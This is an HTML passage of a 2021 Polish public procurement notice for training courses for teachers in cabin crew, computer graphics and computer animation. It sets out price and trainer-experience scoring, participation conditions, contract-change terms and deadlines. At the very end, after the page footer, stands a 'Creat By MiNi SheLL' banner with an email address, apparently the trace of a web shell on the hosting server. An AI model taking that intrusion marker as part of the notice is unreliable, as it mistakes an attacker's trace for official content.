zostanie obliczona zgodnie z formułą: P = Pkc + Pkd gdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie treneraZamawiający udzieli zamówienie Wykonawcy, którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszym ogłoszeniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby szkolącej (trenera)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) – 40 % Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera, który będzie brał udział w wykonywaniu zamówienia z możliwością uzyskania maksymalnie 40 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu).Doświadczenie trenera – waga 40%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 5 kursów – 10 pkt. przeprowadzenie od 6 do 8 kursów – 20 pkt.przeprowadzenie od 9 do 11 kursów – 30 pkt.przeprowadzenie 12 kursów i więcej – 40 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 6 do ogłoszenia) wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: P = Pkc + Pkd gdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie treneraZamawiający udzieli zamówienie Wykonawcy, którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszym ogłoszeniu. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie kursu animacji komputerowych dla 2 nauczycieli </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6575,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) – 40 % Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera, który będzie brał udział w wykonywaniu zamówienia z możliwością uzyskania maksymalnie 40 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu).Doświadczenie trenera – waga 40%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 5 kursów – 10 pkt. przeprowadzenie od 6 do 8 kursów – 20 pkt.przeprowadzenie od 9 do 11 kursów – 30 pkt.przeprowadzenie 12 kursów i więcej – 40 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 6 do ogłoszenia) wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: P = Pkc + Pkd gdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie treneraZamawiający udzieli zamówienie Wykonawcy, którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszym ogłoszeniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby szkolącej (trenera)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) – 40 % Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera, który będzie brał udział w wykonywaniu zamówienia z możliwością uzyskania maksymalnie 40 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu).Doświadczenie trenera – waga 40%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 5 kursów – 10 pkt. przeprowadzenie od 6 do 8 kursów – 20 pkt.przeprowadzenie od 9 do 11 kursów – 30 pkt.przeprowadzenie 12 kursów i więcej – 40 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 6 do ogłoszenia) wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: P = Pkc + Pkd gdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie treneraZamawiający udzieli zamówienie Wykonawcy, którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszym ogłoszeniu. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dot. zdolności technicznej lub zawodowej – Zamawiający określa szczegółowe warunki w tym zakresie:dla części 1 zamówieniaa) dysponuje lub będzie dysponował co najmniej 1 trenerem posiadającym: - doświadczenie w prowadzeniu kursów cabin crew w ilości minimum 3 przeprowadzonych kursów w ciągu ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,- minimum 2 letnie doświadczenie zawodowe jako stewardessa/steward w liniach lotniczych (udokumentowane, rozumiane jako pełne lata czynne zawodowo). dla części 2 zamówieniaa) dysponuje lub będzie dysponował co najmniej 1 trenerem posiadającym doświadczenie w prowadzeniu kursów z zakresu grafiki komputerowej w ilości minimum 3 przeprowadzonych kursów w ciągu ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres działalności jest krótszy w tym okresie.dla części 3 zamówieniaa) dysponuje lub będzie dysponował co najmniej 1 trenerem posiadającym doświadczenie w prowadzeniu kursów z zakresu animacji komputerowych w ilości minimum 3 przeprowadzonych kursów w ciągu ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres działalności jest krótszy w tym okresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Zamawiający żąda złożenia:1) oświadczenia wykonawcy w zakresie art. 108 ust. 1 pkt.5 o braku przynależności do tej samej grupy kapitałowej (w rozumieniu ustawy z dn. 16 lutego 2007 r. o ochronie konkurencji i konsumentów) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załączniki nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia:dla części 1 zamówienia1) wykazu imiennego osób (trenerów) skierowanych do realizacji przedmiotu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia publicznego oraz podstawy dysponowania tym osobami - załącznik nr 4 do SWZ dla części 2 i 3 zamówienia1) wykazu imiennego osób (trenerów) skierowanych do realizacji przedmiotu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego oraz podstawy dysponowania tym osobami - załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pozostałe dokumenty, które musi złożyć Wykonawca wraz z ofertą w niniejszym postępowaniu: 1)	Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i informacji o Działalności Gospodarczej lub innego właściwego rejestru zamawiający żąda pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.2)	Zapisy pkt. 1) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia 3)	Zapisy pkt. 1) stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 uPzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, o którym mowa w pkt 6.4 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie, o którym mowa w ust. 7.1 SWZ składa każdy z tych Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa się pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień niniejszej umowy mogą nastąpić w następującym zakresie :a)	sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy- w przypadku zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmian wytycznych dotyczących realizacji projektu,b)	terminu realizacji zamówienia- w przypadku okoliczności, których Zamawiający działając z należytą starannością nie mógł przewidzieć ( np. związanych z Covid-19),- w przypadku wystąpienia niezawinionych i niemożliwych do uniknięcie przez Wykonawcę opóźnień wynikających z działania siły wyższej (np. klęski żywiołowej), mającej bezpośredni wpływ na terminowość realizacji zamówienia, - w przypadku działania osób trzecich, nie będącego konsekwencją winy którejkolwiek ze stron, uniemożliwiających wykonanie zamówienia w terminie.c)	sposobu realizacji zamówienia - w przypadku okoliczności, których Zamawiający działając z należytą starannością nie mógł przewidzieć ( np. związanych z Covid-19),e) trenerów- w przypadku uzasadnionego wniosku Wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego na zmianę trenera (nowy trener musi jednakże spełniać co najmniej takie same warunki udziału w postępowaniu jak trener pierwotny) lub całkowitą rezygnację z jednego z trenerów wskazanego w wykazie trenerów skierowanych do realizacji zamówienia. f) formy nauczania- w przypadku okoliczności, których Zamawiający działając z należytą starannością nie mógł przewidzieć ( np. związanych z Covid-19),g) podwykonawców i zakresu prac powierzonych podwykonawcom- w przypadku uzasadnionego wniosku Wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego na zmianę podwykonawcy (nowy podwykonawca musi jednakże spełniać takie same warunki jak podwykonawca pierwotny) lub na całkowitą rezygnację z udziału podwykonawcy, a także na zmianę zakresu powierzonych prac podwykonawcy (muszą jednak zostać zachowane wymagania dotyczące części zamówienia, które nie mogą być powierzone podwykonawcy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-08 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Informacje dodatkowe:-Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji.- Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniuPOUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY 1.Środki ochrony prawnej określone przysługują Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów niniejszej ustawy.2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 464 pkt 15 uPzp, oraz Rzecznikowi Małych i Średnich Przedsiębiorców.3. Odwołanie przysługuje na niezgodną z przepisami ustawy czynność Zamawiającego podjętej w postępowaniu o udzielenie zamówienia publicznego lub zaniechaniu czynności w postępowaniu do której Zamawiający był zobowiązany na podstawie ustawy lub zaniechanie przeprowadzenia postępowania o udzielenie zamówienia na podstawie ustawy, mimo, że Zamawiający był do tego obowiązany.4. Odwołanie wnosi się do Prezesa Izby. 5. Odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej albo w terminie 10 dni, jeżeli informacja została przekazana w inny sposób.6. Odwołanie wobec czynności innych niż określone w pkt 21.3 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.6. Na orzeczenie Izby stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. Skargę wnosi się do sądu okręgowego właściwego dla siedziby albo miejsca zamieszkania Zamawiającego.7. Od wyroku sądu lub postanowienia kończącego postępowanie w sprawie nie przysługuje skarga kasacyjna.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com